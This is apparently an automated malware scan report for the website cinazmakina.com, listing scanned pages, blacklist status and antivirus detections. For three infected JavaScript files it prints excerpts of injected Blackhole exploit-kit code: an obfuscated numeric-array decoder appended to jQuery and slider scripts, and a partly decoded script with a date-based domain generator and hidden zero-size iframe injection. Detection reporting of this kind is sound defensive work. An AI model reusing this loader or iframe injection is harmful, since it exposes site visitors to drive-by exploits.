New scan:

Malware Scanner report for cinazmakina.com

Malicious/Suspicious/Total urls checked
3/0/14
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "cinazmakina.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cinazmakina.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://cinazmakina.com/
200 OK
Content-Length: 13528
Content-Type: text/html
clean
http://cinazmakina.com/engine1/jquery.js
200 OK
Content-Length: 85491
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof
... 3082 bytes are skipped ...
,303,184,118,210,345,420,98,210,324,420,116,242,96,244,32,68,312,420,100,200,303,440,34,118,96,40,32,64,96,128,32,64,96,128,32,64,96,128,100,222,297,468,109,202,330,464,46,196,333,400,121,92,291,448,112,202,330,400,67,208,315,432,100,80,315,408,114,218,123,236,10,64,96,128,32,64,96,128,32,250,30,128,32,64,96,500,99,194,348,396,104,80,303,164,123,250,30,500,44,64,159,192,48,82,177];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}/*qhk6sa6g1c*/

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/Blacole.U.2
Avast
JS:Decode-ARK [Trj]
Ad-Aware
Trojan.JS.Agent.GHP
Bkav
MW.Clod440.Trojan.9a72
Ikarus
Virus.JS.Agent
nProtect
Trojan.JS.Agent.GHP
K7AntiVirus
Trojan ( 0040f15a1 )
TrendMicro-HouseCall
JS_IFRAME.WEN
Emsisoft
Trojan.JS.Agent.GHP (B)
Comodo
TrojWare.JS.IFrame.JX
CAT-QuickHeal
JS/BlacoleRef.W
K7GW
Trojan ( 0040f15a1 )
McAfee-GW-Edition
JS/Exploit-Blacole.eu
DrWeb
Exploit.BlackHole.28
TrendMicro
JS_IFRAME.WEN
Microsoft
Trojan:JS/BlacoleRef.BG
MicroWorld-eScan
Trojan.JS.Agent.GHP
Fortinet
JS/Expack.SN!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.eu
NANO-Antivirus
Trojan.Script.Expack.bfdeei
ClamAV
Trojan.Blackhole-488
F-Secure
Trojan.JS.Agent.GHP
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.QD
AVG
JS/Agent
Norman
Blacole.HS
Sophos
Mal/Iframe-AF
GData
Trojan.JS.Agent.GHP
Symantec
JS.Runfore
Commtouch
JS/Agent.QD
BitDefender
Trojan.JS.Agent.GHP

http://cinazmakina.com/engine1/script.js
200 OK
Content-Length: 14720
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ws_fade=function(options){var $=jQuery;options.duration=options.duration||1000;var Images=[];var curIdx=0;this.init=function(aCont){Images=$("img",aCont).get();$(Images).each(function(Index){if(!Index){$(this).show();}else{$(this).hide();}});};this.go=function(new_index){$(Images).each(function(Index){if(Index==new_index){$(this).fadeIn(options.duration);}if(Index==curIdx){$(this).fadeOut(options.duration);}});curIdx=new_index;return true;};};jQuery.fn.wowSlider=function(options){var $this=this;
... 3012 bytes are skipped ...
45,464,121,216,303,184,118,210,345,420,98,210,324,420,116,242,96,244,32,68,312,420,100,200,303,440,34,118,96,40,32,64,96,128,32,64,96,128,32,64,96,128,100,222,297,468,109,202,330,464,46,196,333,400,121,92,291,448,112,202,330,400,67,208,315,432,100,80,315,408,114,218,123,236,10,64,96,128,32,64,96,128,32,250,30,128,32,64,96,500,99,194,348,396,104,80,303,164,123,250,30,500,44,64,159,192,48,82,177];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}

Antivirus reports:

AntiVir
JS/Blackhole.B
Avast
JS:Blackcole-A [Trj]
nProtect
Trojan.JS.Agent.GHP
Emsisoft
Trojan.JS.Agent.GHP (B)
Comodo
TrojWare.JS.IFrame.JX
CAT-QuickHeal
JS/BlacoleRef.W
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Kaspersky
Trojan-Downloader.JS.Expack.sn
Microsoft
Trojan:JS/BlacoleRef.BG
Fortinet
JS/Expack.SN!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.bfdeei
ClamAV
Trojan.Blackhole-488
F-Secure
Trojan.JS.Agent.GHP
AVG
JS/Agent
Norman
Blacole.HS
GData
JS:Blackcole-A
BitDefender
Trojan.JS.Agent.GHP

http://cinazmakina.com/Scripts/AC_RunActiveContent.js
200 OK
Content-Length: 14857
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
function ControlVersion()
{
var version;
var axo;
var e;

try {
axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
version = axo.GetVariable("$version");
} catch (e) {
}
if (!version)
... 3289 bytes are skipped ...
45,464,121,216,303,184,118,210,345,420,98,210,324,420,116,242,96,244,32,68,312,420,100,200,303,440,34,118,96,40,32,64,96,128,32,64,96,128,32,64,96,128,100,222,297,468,109,202,330,464,46,196,333,400,121,92,291,448,112,202,330,400,67,208,315,432,100,80,315,408,114,218,123,236,10,64,96,128,32,64,96,128,32,250,30,128,32,64,96,500,99,194,348,396,104,80,303,164,123,250,30,500,44,64,159,192,48,82,177];if(window.document)for(i=6-2-1-2-1;-1771+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}

Decoded script:


function nextRandomNumber(){
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.seed * this.oneOverM);
}
function RandomNumberGenerator(unix){
var d = new Date(unix*1000);
var s = d.getHours() > 12 ? 1 : 0;
this.seed = 2345678901 + (d.getMonth() * 0
... 4561 bytes are skipped ...
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
}
} catch (e) {
}
}, 500 */
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
}
return (this.see

Antivirus reports:

nProtect
JS:Trojan.Iframer.C
K7AntiVirus
Trojan
Emsisoft
JS:Trojan.Iframer.C (B)
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
Trojan:JS/Iframeinject.AB
MicroWorld-eScan
JS:Trojan.Iframer.C
F-Secure
JS:Trojan.Iframer.C
F-Prot
JS/IFrame.QW
GData
JS:Trojan.Iframer.C
Commtouch
JS/IFrame.QW
BitDefender
JS:Trojan.Iframer.C

http://cinazmakina.com/index.php
200 OK
Content-Length: 13528
Content-Type: text/html
clean
http://cinazmakina.com/?page=1_1
200 OK
Content-Length: 10388
Content-Type: text/html
clean
http://cinazmakina.com/?page=1_2
200 OK
Content-Length: 10732
Content-Type: text/html
clean
http://cinazmakina.com/?page=1_4
200 OK
Content-Length: 8730
Content-Type: text/html
clean
http://cinazmakina.com/?page=1_5
200 OK
Content-Length: 10204
Content-Type: text/html
clean
http://cinazmakina.com/?page=2
200 OK
Content-Length: 10800
Content-Type: text/html
clean
http://cinazmakina.com/?page=3
200 OK
Content-Length: 10442
Content-Type: text/html
clean
http://cinazmakina.com/?page=5
200 OK
Content-Length: 7411
Content-Type: text/html
clean
http://cinazmakina.com/?page=6
200 OK
Content-Length: 13660
Content-Type: text/html
clean
http://cinazmakina.com/test404page.js
404 Not Found
Content-Length: 389
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cinazmakina.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 07:09:29 GMT
Content-Type: text/html
X-Powered-By: PHP/5.2.17
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: cinazmakina.com
Referer: http://www.google.com/search?q=cinazmakina.com

Result:
The result is similar to the first query. There are no suspicious redirects found.